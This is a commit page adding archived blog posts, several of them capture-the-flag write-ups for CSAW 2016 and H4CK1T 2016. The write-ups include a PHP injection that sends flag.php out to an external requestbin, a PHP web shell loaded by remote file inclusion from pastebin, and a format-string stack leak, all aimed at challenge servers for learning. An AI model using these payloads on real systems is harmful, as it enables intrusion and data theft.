michael/blog
1
0
Fork 0
Code Issues 2 Pull requests Releases Packages 1 Wiki Activity

old blog posts
All checks were successful
ci/woodpecker/push/woodpecker Pipeline was successful
Details

Browse source
This commit is contained in:
Michael Zhang 2024-10-07 23:24:35 -05:00
parent 702ab0e9f6
commit 096a7a1280
17 changed files with 1279 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

31
src/content/posts/2014-12-28_How-to-accomplish-something.md Normal file
View file

@ -0,0 +1,31 @@
---
title: How to accomplish something.
date: 2014-12-28T06:18:06.940Z
tags: [medium-blog]
---
<article class="h-entry">
<section data-field="subtitle" class="p-summary">
Its really simple.
</section>
<section data-field="body" class="e-content">
<section name="d840" class="section section--body section--first section--last">
<div class="section-content">
<div class="section-inner sectionLayout--insetColumn">
<p name="c074" id="c074" class="graf graf--p graf-after--h3">Dont.</p>
<p name="8add" id="8add" class="graf graf--p graf-after--p">Give.</p>
<p name="2290" id="2290" class="graf graf--p graf-after--p">Up.</p>
<p name="6014" id="6014" class="graf graf--p graf-after--p graf--trailing">Simple.</p>
</div>
</div>
</section>
</section>
<footer>
<p>By <a href="https://medium.com/@failedxyz" class="p-author h-card">Michael Zhang</a> on <a
href="https://medium.com/p/f5c2ca623a76"><time class="dt-published"
datetime="2014-12-28T06:18:06.940Z">December 28, 2014</time></a>.</p>
<p><a href="https://medium.com/@failedxyz/how-to-accomplish-something-f5c2ca623a76"
class="p-canonical">Canonical link</a></p>
<p>Exported from <a href="https://medium.com">Medium</a> on October 8, 2024.</p>
</footer>
</article>

74
src/content/posts/2015-03-19_A-Much-Needed-Apology.md Normal file
View file

@ -0,0 +1,74 @@
---
title: A Much-Needed Apology
date: 2015-03-19T23:34:26.674Z
tags: [medium-blog]
---
<article class="h-entry">
<section data-field="body" class="e-content">
<section name="276e" class="section section--body section--first section--last">
<div class="section-content">
<div class="section-inner sectionLayout--insetColumn">
<p name="cbee" id="cbee" class="graf graf--p graf-after--h3">If youre participating in CTCTF this week, I
know it has been a hard week, and I have a huge apology to make, about several things.</p>
<p name="aa08" id="aa08" class="graf graf--p graf-after--p">I should not have helped out with this CTF. I
didnt have much time to work on it, I was busy with school, and it really wasnt a good time for me to be
doing it. However, I was really stupid so I decided to jump in anyway.</p>
<p name="def7" id="def7" class="graf graf--p graf-after--p"><strong
class="markup--strong markup--p-strong">If youre in a rush, and you dont care about all this stuff,
skip down to the bottom for the final hint.</strong></p>
<h4 name="dae6" id="dae6" class="graf graf--h4 graf-after--p">Backend</h4>
<p name="a52e" id="a52e" class="graf graf--p graf-after--h4">The website backend problems were completely my
fault. Things like the problems page saying your problem was unsolved when you actually received points
for it, or not being able to submit answers for problems because it said “Youve already tried this.” Part
of this was not havingenough time to thoroughly test the server and catch all the problems.</p>
<h4 name="a9f0" id="a9f0" class="graf graf--h4 graf-after--p">IRC</h4>
<p name="6939" id="6939" class="graf graf--p graf-after--h4">This really isnt my problem. But Ill address
it anyway. The biggest problem was the choice of using Pdgn server. It works well for its purpose, and
does serve all its values. But it was too underdeveloped to use in an actual CTF, lacking features
including:</p>
<ul class="postList">
<li name="c5b2" id="c5b2" class="graf graf--li graf-after--p">Authenticationpeople just stole other
peoples usernames.</li>
<li name="379e" id="379e" class="graf graf--li graf-after--li">Operatorswe lost all ops in the original
channel <em class="markup--em markup--li-em">and</em> the new channel.</li>
<li name="033c" id="033c" class="graf graf--li graf-after--li">Connection issues—we got lots of ECONNRESET
issues with KiwiIRC.</li>
</ul>
<h4 name="dd66" id="dd66" class="graf graf--h4 graf-after--li">Problems</h4>
<p name="1114" id="1114" class="graf graf--p graf-after--h4">I dont know what to say about this. I urged
the other team members to shorten the duration of the competition to 3 days, but they wouldnt budge, so
we ended up having a 7-day competition with only 20 easy problems. My friend said he solved all but 2 of
them in an hour.</p>
<p name="e3aa" id="e3aa" class="graf graf--p graf-after--p">We werent even going to use 1023megabytes
originally. But because of the immediate lack of problems, I figured we would need it.</p>
<p name="ebdb" id="ebdb" class="graf graf--p graf-after--p">When the competition started, there were only 18
questions up. I wrote “3 hard 3 me” in about 15 minutes during class. If youre running a competition,
youd want to keep your participants interests as long as possible; theres no point if everyone quits
after a daywhich is basically what happened.</p>
<p name="6d7d" id="6d7d" class="graf graf--p graf-after--p">I figured the purpose of creating such an
insanely BS problem was to keep people interested in the CTF, but also to keep the mods (who are on the
verge of quitting) motivated to keep going. I originally planned to give a lot of hints, and here is the
last one.</p>
<h4 name="110a" id="110a" class="graf graf--h4 graf-after--p">Hints</h4>
<p name="a74e" id="a74e" class="graf graf--p graf-after--h4">This is the final hint for “3 hard 3 me”: base
16, base 2, base 3.</p>
<p name="25ea" id="25ea" class="graf graf--p graf-after--p">For 1023megabytes, you probably already made
some connection between me and a group called the Donut Mafia. Try to find our fundraising website, and
the flag will be on a userpage.</p>
<p name="a67a" id="a67a" class="graf graf--p graf-after--p graf--trailing">I feel like I owe this to
everyone for a bad competition and hope you forgive me for all these mistakes. They wont happen again. I
guess Ill see you guys at the next CTF.</p>
</div>
</div>
</section>
</section>
<footer>
<p>By <a href="https://medium.com/@failedxyz" class="p-author h-card">Michael Zhang</a> on <a
href="https://medium.com/p/8f50537a8932"><time class="dt-published" datetime="2015-03-19T23:34:26.674Z">March
19, 2015</time></a>.</p>
<p><a href="https://medium.com/@failedxyz/a-much-needed-apology-8f50537a8932" class="p-canonical">Canonical
link</a></p>
<p>Exported from <a href="https://medium.com">Medium</a> on October 8, 2024.</p>
</footer>
</article>

44
src/content/posts/2015-10-20_Pwnable-kr--fd--1.md Normal file
View file

@ -0,0 +1,44 @@
---
title: "Pwnable.kr: fd (1)"
date: 2015-10-20T18:20:38.431Z
tags: [medium-blog]
---
<article class="h-entry">
<section data-field="body" class="e-content">
<section name="1d23" class="section section--body section--first section--last">
<div class="section-content">
<div class="section-inner sectionLayout--insetColumn">
<p name="ec7e" id="ec7e" class="graf graf--p graf-after--h3">This is my first writeup. The problem reads:
</p>
<blockquote name="b33e" id="b33e" class="graf graf--blockquote graf-after--p">Mommy! what is a file
descriptor in Linux?<br>ssh fd@pwnable.kr -p2222 (pw:guest)</blockquote>
<p name="0cc2" id="0cc2" class="graf graf--p graf-after--blockquote">Since it tells us to SSH to their
server, well do that. Upon logging in, we find fd, an executable binary, fd.c, the source file, and flag,
the target file we are trying to read, but is currently protected by root. Lets begin by analyzing fd.c.
</p>
<p name="3ba1" id="3ba1" class="graf graf--p graf-after--p">At the if statement, the program is checking buf
against the string LETMEWIN. Where is buf being read? Its being read from a variable called fd, which is
a <a href="https://en.wikipedia.org/wiki/File_descriptor"
data-href="https://en.wikipedia.org/wiki/File_descriptor" class="markup--anchor markup--p-anchor"
rel="noopener" target="_blank"><strong class="markup--strong markup--p-strong">file
descriptor</strong></a>. Since the only way we can give input to the program is STDIN_FILENO, we have
to make sure fd is set to 0.</p>
<p name="a905" id="a905" class="graf graf--p graf-after--p">According to the code, fd is calculated by atoi(
argv[1] )0x1234: it converts the user input into an integer and subtracts 0x1234, or 4660 in decimal.
To make fd equal to 0, we simply pass 4660 as an argument. This should cause the program to prompt us for
input. Now we just enter LETMEWIN, and it should print out the flag :)</p>
<blockquote name="8dca" id="8dca" class="graf graf--blockquote graf-after--p graf--trailing">mommy! I think
I know what a file descriptor is!!</blockquote>
</div>
</div>
</section>
</section>
<footer>
<p>By <a href="https://medium.com/@failedxyz" class="p-author h-card">Michael Zhang</a> on <a
href="https://medium.com/p/f9b66ed3a312"><time class="dt-published"
datetime="2015-10-20T18:20:38.431Z">October 20, 2015</time></a>.</p>
<p><a href="https://medium.com/@failedxyz/pwnable-kr-fd-1-f9b66ed3a312" class="p-canonical">Canonical link</a></p>
<p>Exported from <a href="https://medium.com">Medium</a> on October 8, 2024.</p>
</footer>
</article>

34
src/content/posts/2016-09-07_So--I-started-a-blog.md Normal file
View file

@ -0,0 +1,34 @@
---
title: So. I started a blog.
date: 2016-09-07T20:18:04.000Z
tags: [medium-blog]
---
<article class="h-entry">
<section data-field="body" class="e-content">
<section name="3307" class="section section--body section--first section--last">
<div class="section-content">
<div class="section-inner sectionLayout--insetColumn">
<p name="d54d" id="d54d" class="graf graf--p graf-after--h3">Hi. Im Michael, a college freshman at the
University of Minnesota. I love writing code, and I would frequently participate in capture-the-flag (CTF)
competitions! I might be posting more about those here.</p>
<p name="138d" id="138d" class="graf graf--p graf-after--p">Ill use this space to rant about life. And post
CTF writeups too (maybe).</p>
<p name="2f45" id="2f45" class="graf graf--p graf-after--p graf--trailing">Im really trying to change my
study/life habits now that I have more freedom. More specifically, going to sleep at 3:00am every day
isnt going to work anymore. Recently I started waking up at 6:15am and I think getting things done in the
morning is even easier than getting things done at night for me. Only problem is the waking up part. Ill
try it for a couple weeks and Ill let you guys know how it goes.</p>
</div>
</div>
</section>
</section>
<footer>
<p>By <a href="https://medium.com/@failedxyz" class="p-author h-card">Michael Zhang</a> on <a
href="https://medium.com/p/f2d0db8a955d"><time class="dt-published"
datetime="2016-09-07T20:18:04.000Z">September 7, 2016</time></a>.</p>
<p><a href="https://medium.com/@failedxyz/so-i-started-a-blog-f2d0db8a955d" class="p-canonical">Canonical link</a>
</p>
<p>Exported from <a href="https://medium.com">Medium</a> on October 8, 2024.</p>
</footer>
</article>

98
src/content/posts/2016-09-18_CSAW-CTF-2016-Quals.md Normal file
View file

@ -0,0 +1,98 @@
---
title: CSAW CTF 2016 Quals
date: 2016-09-18T23:04:12.000Z
tags: [medium-blog]
---
<article class="h-entry">
<section data-field="body" class="e-content">
<section name="81bc" class="section section--body section--first section--last">
<div class="section-content">
<div class="section-inner sectionLayout--insetColumn">
<p name="3250" id="3250" class="graf graf--p graf-after--h3">Over the weekend, I worked with the team
Gophers in the Shell on CSAW CTF 2016. We ended up placing 317th place, with 401 points. Here Im going to
document the problems that I solved during the competition.</p>
<h3 name="74cf" id="74cf" class="graf graf--h3 graf-after--p">Coinslot</h3>
<p name="7bae" id="7bae" class="graf graf--p graf-after--h3">For 25 points, the objective of this problem is
to output which coins/bills are needed for a given amount of money. When you connect to the server, it
will give you an amount in the form of $100.00 and then proceed to ask questions like $10,000 bills?. To
do this, I wrote a Python client to interact with the server.</p>
<pre name="7d34" id="7d34"
class="graf graf--pre graf-after--p">import socket<br>s = socket.socket()<br>s.connect((“misc.chal.csaw.io”, 8000))</pre>
<pre name="8c45" id="8c45"
class="graf graf--pre graf-after--pre">def recv(end=\n):<br> c, t = , <br> while c != end:<br> c = s.recv(1)<br> t += c<br> return t</pre>
<p name="79eb" id="79eb" class="graf graf--p graf-after--pre">This code will open a connection to the server
and read input until a certain character is reached. The algorithm for this problem is rather simple;
starting from the largest denomination ($10,000 bills), check if the remaining amount is greater than the
denomination (in other words, if that bill/coin can be used to pay the remaining amount), and then
subtract the largest multiple of that bill/coin from the remaining amount. In code, that looks like this:
</p>
<pre name="8793" id="8793"
class="graf graf--pre graf-after--p">r = recv()<br>amt = int(r.strip(“$”).strip().replace(“.”, “”))<br>print amt<br>for denom in denoms:<br> n = amt // denom<br> s.send(“%d\n” % n)<br> amt %= denom<br>recv()</pre>
<p name="2a5d" id="2a5d" class="graf graf--p graf-after--pre">Upon success, the server will then ask another
amount. I didnt keep track of how many times it asked, but I wrapped the above code in a <code
class="markup--code markup--p-code">while True</code> loop and eventually I got the flag.</p>
<h3 name="bc76" id="bc76" class="graf graf--h3 graf-after--p">mfw</h3>
<p name="0e1b" id="0e1b" class="graf graf--p graf-after--h3">In this challenge we were presented with a site
with a navigation bar. On the About page, it tells you that the site was made with Git, PHP, and
Bootstrap. Upon seeing git, I immediately thought to check if the <code
class="markup--code markup--p-code">.git</code> folder was actually stored in the www root, and it was!
I ripped the git folder off the site and cloned it to restore the original folder structure.</p>
<p name="34a9" id="34a9" class="graf graf--p graf-after--p">There was a <code
class="markup--code markup--p-code">flag.php</code> in the templates folder, but the actual flag was
missing. That means I had to retrieve the flag from the actual server.</p>
<p name="c3f9" id="c3f9" class="graf graf--p graf-after--p">From the way the navigation bar was constructed,
it looks like I need to use local file inclusion. But I couldnt use phps <code
class="markup--code markup--p-code">base64</code> filter to print the contents of <code
class="markup--code markup--p-code">flag.php</code> because the <code
class="markup--code markup--p-code">$file</code> variable will stick ”templates/” to the front of the
given page before its <code class="markup--code markup--p-code">require_once</code>d.</p>
<p name="c2bf" id="c2bf" class="graf graf--p graf-after--p">The trick to solving this one is injecting PHP
commands in the assert statements. I suspect that writing to the filesystem has been blocked. So instead,
I made a <a href="http://requestb.in" data-href="http://requestb.in"
class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">requestbin</a> that I would make
a GET request to, containing the contents of <code class="markup--code markup--p-code">flag.php</code>!
</p>
<p name="61df" id="61df" class="graf graf--p graf-after--p">The page I requested was:</p>
<pre name="8255" id="8255"
class="graf graf--pre graf-after--p">http://web.chal.csaw.io:8000/?page=flag%27+%2B+fopen%28%27http%3A%2F%2Frequestb.in%2F1l5k31z1%3Fp%3D%27+.+urlencode%28file_get_contents%28%27templates%2Fflag.php%27%29%29%2C+%27r%27%29+%2B+%27</pre>
<p name="80fb" id="80fb" class="graf graf--p graf-after--pre">Un-URL encoded, this looks like:</p>
<pre name="4d99" id="4d99"
class="graf graf--pre graf-after--p">flag + fopen(http://requestb.in/1l5k31z1?p=&#39; . urlencode(file_get_contents(templates/flag.php)), r) + </pre>
<p name="e3c2" id="e3c2" class="graf graf--p graf-after--pre">As you can see, Im reading the contents of
<code class="markup--code markup--p-code">flag.php</code>, URL-encoding it, and sending it to this
requestbin. This way, I can retrieve it from the requestbin later.
</p>
<h3 name="1a12" id="1a12" class="graf graf--h3 graf-after--p">Gametime</h3>
<p name="b5b0" id="b5b0" class="graf graf--p graf-after--h3">I got this close to the end of the competition,
but it suddenly hit me that if I just invert the condition of (if you hit the right key), then it will
think you win if you do absolutely nothing. Since they distributed the binary file instead of hosting it
on a server, this means I could just patch the binary file and re-run it.</p>
<p name="5875" id="5875" class="graf graf--p graf-after--p">I opened the exe in IDA, and used Alt+T to
search for <code class="markup--code markup--p-code">UDDER FAILURE</code>, the string it prints when you
fail. It actually occurs twice in the program, first during the “tutorial” level, and then during the
actual thing.</p>
<p name="3165" id="3165" class="graf graf--p graf-after--p">In both instances, right above where it prints
<code class="markup--code markup--p-code">UDDER FAILURE</code>, there is a <code
class="markup--code markup--p-code">jnz</code> that checks if the key you pressed was right. More
specifically, this occurs at <code class="markup--code markup--p-code">004014D5</code> and <code
class="markup--code markup--p-code">00401554</code>. To invert the condition, I had to change <code
class="markup--code markup--p-code">jnz</code> to <code class="markup--code markup--p-code">jz</code>.
In opcodes, thats <code class="markup--code markup--p-code">75</code> and <code
class="markup--code markup--p-code">74</code>.
</p>
<p name="b409" id="b409" class="graf graf--p graf-after--p graf--trailing">Then I just ran the program
again, and waited for it to pass all the checks, and I got the flag!</p>
</div>
</div>
</section>
</section>
<footer>
<p>By <a href="https://medium.com/@failedxyz" class="p-author h-card">Michael Zhang</a> on <a
href="https://medium.com/p/f9c51dffa34"><time class="dt-published"
datetime="2016-09-18T23:04:12.000Z">September 18, 2016</time></a>.</p>
<p><a href="https://medium.com/@failedxyz/csaw-ctf-2016-quals-f9c51dffa34" class="p-canonical">Canonical link</a>
</p>
<p>Exported from <a href="https://medium.com">Medium</a> on October 8, 2024.</p>
</footer>
</article>

186
src/content/posts/2016-10-02_H4CK1T-CTF-2016.md Normal file
View file

@ -0,0 +1,186 @@
---
title: H4CK1T CTF 2016
date: 2016-10-02T20:46:42.000Z
tags: [medium-blog]
---
<article class="h-entry">
<section data-field="body" class="e-content">
<section name="efb5" class="section section--body section--first section--last">
<div class="section-content">
<div class="section-inner sectionLayout--insetColumn">
<p name="1568" id="1568" class="graf graf--p graf-after--h3">Over the past week, I again worked with Gophers
in the Shell on a Ukrainian CTF called H4CK1T CTF. We finished 59th out of 1057 teams, with 2703 points.
Here are some of my writeups.</p>
<h3 name="6a51" id="6a51" class="graf graf--h3 graf-after--p">Algeria (250)</h3>
<p name="dab1" id="dab1" class="graf graf--p graf-after--h3">In this task we are given an encrypted image as
well as the encryption script. The script looks like this (condensed):</p>
<pre name="7b4d" id="7b4d"
class="graf graf--pre graf-after--p">x = random.randint(1,255)<br>y = random.randint(1,255)</pre>
<pre name="4540" id="4540"
class="graf graf--pre graf-after--pre">img_pix.putpixel((0,0),(len(FLAG),x,y))</pre>
<pre name="636c" id="636c"
class="graf graf--pre graf-after--pre">for l in FLAG:<br> x1 = random.randint(1,255)<br> y1 = random.randint(1,255)<br> img_pix.putpixel((x,y),(ord(l),x1,y1))<br> x = x1<br> y = y1</pre>
<pre name="5375" id="5375" class="graf graf--pre graf-after--pre">img_pix.save(encrypted.png)</pre>
<p name="f59f" id="f59f" class="graf graf--p graf-after--pre">It seems that each character of the flag is
placed at random points in the encrypted image. Fortunately, each character also comes with the
coordinates of the next character. To solve the challenge, we just write a reversing script.</p>
<pre name="61b5" id="61b5"
class="graf graf--pre graf-after--p">FLAG = “”<br>img = Image.open(“encrypted.png”)<br>img_pix = img.convert(“RGB”)</pre>
<pre name="bd59" id="bd59"
class="graf graf--pre graf-after--pre">FLAG_LEN, x, y = img_pix.getpixel((0, 0))<br>for i in range(FLAG_LEN — 1):<br> c, x, y = img_pix.getpixel((x, y))<br> FLAG += chr(c)</pre>
<pre name="cd1f" id="cd1f" class="graf graf--pre graf-after--pre">print FLAG</pre>
<p name="d169" id="d169" class="graf graf--p graf-after--pre">The flag is <code
class="markup--code markup--p-code">h4ck1t{1NF0RM$T10N_1$_N0T_$3CUR3_4NYM0R}</code>.</p>
<h3 name="e98b" id="e98b" class="graf graf--h3 graf-after--p">Argentina (100)</h3>
<p name="dbc4" id="dbc4" class="graf graf--p graf-after--h3">Im guessing the point of this problem was for
you to go through the network data and look for the right packets, but I just used <code
class="markup--code markup--p-code">strings</code>.</p>
<pre name="4678" id="4678"
class="graf graf--pre graf-after--p">$ strings top_secret_39af3e3ce5a5d5bc915749267d92ba43.pcap | grep h4ck1t<br>PASS h4ck1t{i_G07_ur_f1l3s}</pre>
<p name="5407" id="5407" class="graf graf--p graf-after--pre">The flag is <code
class="markup--code markup--p-code">h4ck1t{i_G07_ur_f1l3s}</code>.</p>
<h3 name="d1f6" id="d1f6" class="graf graf--h3 graf-after--p">Brazil (100)</h3>
<p name="d93e" id="d93e" class="graf graf--p graf-after--h3">In this challenge, we get a ZIP full of random
files (that look super suspicious), and we are asked to look for a secret. One place I eventually decided
to look at was Thumbs.db, which is a file that stores thumbnails for Windows Explorer.</p>
<p name="ccd5" id="ccd5" class="graf graf--p graf-after--p">There are many tools out there that can help
open this type of file. I used <a href="https://thumbsviewer.github.io"
data-href="https://thumbsviewer.github.io" class="markup--anchor markup--p-anchor" rel="noopener"
target="_blank">Thumbs Viewer</a>. Either way, the flag is the name of one of the thumbnails, <code
class="markup--code markup--p-code">h4ck1t{75943a3ca2223076e997fe30e17597d4}</code>.</p>
<h3 name="7d4a" id="7d4a" class="graf graf--h3 graf-after--p">Canada (300)</h3>
<p name="4a27" id="4a27" class="graf graf--p graf-after--h3">I dont think I did this the intended way, but
we were given a binary that apparently produces an output file. But I just did</p>
<pre name="62cc" id="62cc"
class="graf graf--pre graf-after--p">$ strings parse | grep h4ck1t<br> to unused region of span2910383045673370361328125_cgo_thread_start missingacquirep: invalid p stateallgadd: bad status Gidlebad procedure for programbad status in shrinkstackcant scan gchelper stackchansend: spurious wakeupcheckdead: no m for timercheckdead: no p for timerh4ck1t{T0mmy_g0t_h1s_Gun}mach_semcreate desc countmissing stack in newstackno buffer space availableno such file or directoryoperation now in progressreflect: Bits of nil Typereleasep: invalid p stateresource deadlock avoidedruntime: program exceeds runtime</pre>
<p name="500e" id="500e" class="graf graf--p graf-after--pre">The flag is <code
class="markup--code markup--p-code">h4ck1t{T0mmy_g0t_h1s_Gun}</code>.</p>
<h3 name="5532" id="5532" class="graf graf--h3 graf-after--p">China (150)</h3>
<p name="5d82" id="5d82" class="graf graf--p graf-after--h3">This one was rather annoying. When you first
open the RTF file, there is about 53 pages of random hex. I stripped all the nonsense off, and opened the
binary file with HxD, only to discover that it was a PNG. Not only that, it seemed to have a ZIP appended
to the end of it.</p>
<p name="d14c" id="d14c" class="graf graf--p graf-after--p">At that point, I just <code
class="markup--code markup--p-code">binwalk</code>d the PNG and extracted the ZIP, leading me to <code
class="markup--code markup--p-code">flag.txt</code>, containing the flag, <code
class="markup--code markup--p-code">h4ck1t{rtf_d0cs_4r3_awesome}</code>.</p>
<h3 name="d060" id="d060" class="graf graf--h3 graf-after--p">Chile (100)</h3>
<p name="2e87" id="2e87" class="graf graf--p graf-after--h3">Were told to connect to <code
class="markup--code markup--p-code">91.231.84.36:9001</code>. When we connect, we are greeted with a
prompt: <code class="markup--code markup--p-code">wanna see?</code></p>
<p name="bfaf" id="bfaf" class="graf graf--p graf-after--p">It seems that the program will print back
whatever you give it. One thought that came to mind was a print format vulnerability. If the program calls
<code class="markup--code markup--p-code">printf(input)</code> where <code
class="markup--code markup--p-code">input</code> is the user input, then putting format symbols into our
input will cause the program to start reading off the stack.
</p>
<p name="91c7" id="91c7" class="graf graf--p graf-after--p">There was probably a better way to do it, but
essentially I just grabbed the top 50 elements off the stack and looked for a flag. And it was there!</p>
<pre name="423e" id="423e"
class="graf graf--pre graf-after--p">failedxyz@backtick:~$ python -c print “%p-” * 50 | nc 91.231.84.36 9001<br>wanna see?<br>ok, so…<br>0x7f07781984830x7f07781999e00x7f0777ec47100x7f07781999e0-(nil)-0x70252d70252d70250x252d70252d70252d-0x2d70252d70252d700x70252d70252d70250x252d70252d70252d-0x2d70252d70252d700x70252d70252d70250x252d70252d70252d-0x2d70252d70252d700x70252d70252d70250x252d70252d70252d-0x2d70252d70252d700x70252d70252d70250x252d70252d70252d-0x2d70252d70252d700x70252d70252d70250x252d70252d70252d-0x2d70252d70252d700x2d70252d7025-(nil)-(nil)-0x7f0777de7c38-(nil)-0x7ffe058d71d00x7f07781984000x7f0777e549870x7f0778198400-(nil)-0x7f07783c77400x7f0777e517d90x7f07781984000x7f0777e49693-(nil)-0xea7c2294f9fed0000x7ffe058d71d00x4007c10x647b74316b6334680x355f7530595f44310x3f374168375f65450x7d373f-0x4007f00xea7c2294f9fed0000x7ffe058d72b0-(nil)-(nil)-</pre>
<p name="92bf" id="92bf" class="graf graf--p graf-after--pre">If you get rid of the <code
class="markup--code markup--p-code">(nil)</code>s and reverse the string (remember endianness), then you
should eventually arrive at the flag, which is <code
class="markup--code markup--p-code">h4ck1t{d1D_Y0u_5Ee_7hA7??7}</code>.</p>
<h3 name="5a4b" id="5a4b" class="graf graf--h3 graf-after--p">Germany (200)</h3>
<p name="7699" id="7699" class="graf graf--p graf-after--h3">In this problem, we are given a dump of some
Corp Users home folder. Most of the documents are useless, but what we are looking for is in the AppData
folder. More specifically, the transmission of information happens over Skype, so I looked in <code
class="markup--code markup--p-code">AppData\Roaming\Skype\live#3aames.aldrich</code>.</p>
<p name="e494" id="e494" class="graf graf--p graf-after--p"><code
class="markup--code markup--p-code">main.db</code> kinda stuck out, so I opened that first. It was an
SQLite database of a bunch of different Skype data. I ended up finding the flag in the <code
class="markup--code markup--p-code">Contacts</code> table, in the row containing the user <code
class="markup--code markup--p-code">zog black</code>, under <code
class="markup--code markup--p-code">province</code> and <code
class="markup--code markup--p-code">city</code> columns apparently. The flag was <code
class="markup--code markup--p-code">h4ck1t{87e2bc9573392d5f4458393375328cf2}</code>.</p>
<h3 name="16a6" id="16a6" class="graf graf--h3 graf-after--p">Mexico (150)</h3>
<p name="5e37" id="5e37" class="graf graf--p graf-after--h3">If you click around the navigation bar of the
website, youll notice that the pages are loaded by <code
class="markup--code markup--p-code">index.php?page=example</code>. It probably includes pages through
some naive include function without any sanitation, although it appends <code
class="markup--code markup--p-code">.php</code> to the end of the filename.</p>
<p name="8bdd" id="8bdd" class="graf graf--p graf-after--p">To bypass this, we just stick a <code
class="markup--code markup--p-code">%00</code> null character to the end of our URL. Then PHP stops
reading when it hits that and wont append <code class="markup--code markup--p-code">.php</code> after the
file. But what file can we include to find the flag?</p>
<p name="a0e1" id="a0e1" class="graf graf--p graf-after--p">It occurred to me that if we could include any
file, we could set up a pastebin containing an executable PHP code, and then include it. The PHP code I
included looks like this:</p>
<pre name="cd28" id="cd28"
class="graf graf--pre graf-after--p">if (isset($_GET[cmd]))<br> echo system($_GET[cmd]);<br>?&gt;</pre>
<p name="4372" id="4372" class="graf graf--p graf-after--pre">Stick that in a pastebin or something, and
then include it in your URL like this:</p>
<pre name="5f6d" id="5f6d"
class="graf graf--pre graf-after--p">http://91.231.84.36:9150/index.php?page=http://pastebin.com/raw/icSpe0F0%00</pre>
<p name="e164" id="e164" class="graf graf--p graf-after--pre">Now you can execute shell commands from the
URL. Doing an <code class="markup--code markup--p-code">ls</code> on the current directory reveals a file
called <code class="markup--code markup--p-code">sup3r_$3cr3t_f1le.php</code>. If you <code
class="markup--code markup--p-code">cat sup3r*</code> then you should be able to get the flag: <code
class="markup--code markup--p-code">h4ck1t{g00d_rfi_its_y0ur_fl@g}</code>.</p>
<h3 name="4b38" id="4b38" class="graf graf--h3 graf-after--p">Mongolia (100)</h3>
<p name="e011" id="e011" class="graf graf--p graf-after--h3">In this problem we are asked to connect to
<code class="markup--code markup--p-code">ctf.com.ua:9988</code> and solve math problems. We told <code
class="markup--code markup--p-code">C = A ^ B</code> and then given C, we are asked to find A and B.
Problem is, the C that they give are sometimes hundreds of digits long. Brute forcing directly is not a
good idea.
</p>
<p name="486d" id="486d" class="graf graf--p graf-after--p">The algorithm we used was to prime-factorize C,
and then multiply the factors as A, and counting how many of each factor as B. Obviously, if a factor like
2 appeared more than once, we multiply it twice into A, rather than making B twice as large.</p>
<p name="2a7c" id="2a7c" class="graf graf--p graf-after--p">We used the Sieve of Atkin to generate a list of
primes up to 10,000,000 (although we probably didnt need that many), and stored it into <code
class="markup--code markup--p-code">primes.txt</code>. The final program looks like this:</p>
<pre name="f6c7" id="f6c7"
class="graf graf--pre graf-after--p">from collections import Counter<br>import socket</pre>
<pre name="7f31" id="7f31"
class="graf graf--pre graf-after--pre">s = socket.socket()<br>s.connect((“ctf.com.ua”, 9988))</pre>
<pre name="50f2" id="50f2"
class="graf graf--pre graf-after--pre">primes = map(int, open(“primes.txt”).read().split(“ “))<br>i = 0<br>while True:<br> o = s.recv(8192)<br> print o<br> q = o.replace(“\n”, “”).replace(“ “, “”).split(“C=”)<br> r = int(q[-1])<br> print r<br> done = False<br> factors = []<br> for prime in primes:<br> while r % prime == 0:<br> factors.append(prime)<br> r //= prime<br> c = Counter(factors)<br> f = zip(*c.items())<br> B = min(c.values())<br> print f, c<br> A = reduce(lambda x, y: x * (y ** (c[y] // B)), f[0], 1)<br> if B == 1: A = r<br> print A, B<br> s.send(“%s %s\n” % (A, B))</pre>
<p name="16fa" id="16fa" class="graf graf--p graf-after--pre">The flag is <code
class="markup--code markup--p-code">h4ck1t{R4ND0M_1S_MY_F4V0UR1T3_W34P0N}</code>.</p>
<h3 name="51b1" id="51b1" class="graf graf--h3 graf-after--p">Oman (50)</h3>
<p name="8660" id="8660" class="graf graf--p graf-after--h3">I was so excited to do this challenge! Once I
unzipped the file and saw the folders and files, I knew it was a Minecraft world save!</p>
<p name="13b9" id="13b9" class="graf graf--p graf-after--p">I kind of saw it coming, but once I opened the
world, tons of shit blew up in my face. I decided to open it with MCEdit instead. There is a sign above
the spawn point that asks you to “remove the gray”. Since there was a huge rectangular field of bedrock, I
assumed it meant that.</p>
<p name="3476" id="3476" class="graf graf--p graf-after--p">Thing is if you play, and step on the pressure
plate, it will trigger a TNT chain reaction, blowing up the blocks that make up the flag. Using MCEdit, I
just selected the bedrock region and deleted it, revealing the flag below: <code
class="markup--code markup--p-code">h4ck1t{m1n3craft_h4c3r}</code>.</p>
<h3 name="d421" id="d421" class="graf graf--h3 graf-after--p">Paraguay (250)</h3>
<p name="3a9c" id="3a9c" class="graf graf--p graf-after--h3">Honestly, this one was such a pain in the ass.
Just when you thought it was 100 nested ZIPs, suddenly a RAR comes out of nowhere. Fortunately, a Python
library called <code class="markup--code markup--p-code">pyunpack</code> figures that out for you, by
checking the magic number of the file. The final script looks like this:</p>
<pre name="1165" id="1165"
class="graf graf--pre graf-after--p">from pyunpack import *<br>import shutil</pre>
<pre name="e117" id="e117"
class="graf graf--pre graf-after--pre">for i in range(100, 0, -1):<br> Archive(“%d” % i).extractall(“.”)<br> shutil.move(“work_folder/%d” % (i — 1), “%d” % (i — 1))</pre>
<p name="4d19" id="4d19" class="graf graf--p graf-after--pre">The flag is <code
class="markup--code markup--p-code">h4ck1t{0W_MY_G0D_Y0U_M4D3_1T}</code> .</p>
<h3 name="ee3c" id="ee3c" class="graf graf--h3 graf-after--p">United States (50)</h3>
<p name="216c" id="216c" class="graf graf--p graf-after--h3">This one was a freebie. Join their Telegram
channel and you get a free flag: <code
class="markup--code markup--p-code">h4ck1t{fr33_4nd_$ecur3!}</code>.</p>
<h3 name="df84" id="df84" class="graf graf--h3 graf-after--p">Trivia</h3>
<p name="7257" id="7257" class="graf graf--p graf-after--h3">There were a lot of trivia questions on the
board! They werent worth much, but still pretty fun. Here are the solutions:</p>
<pre name="28e0" id="28e0"
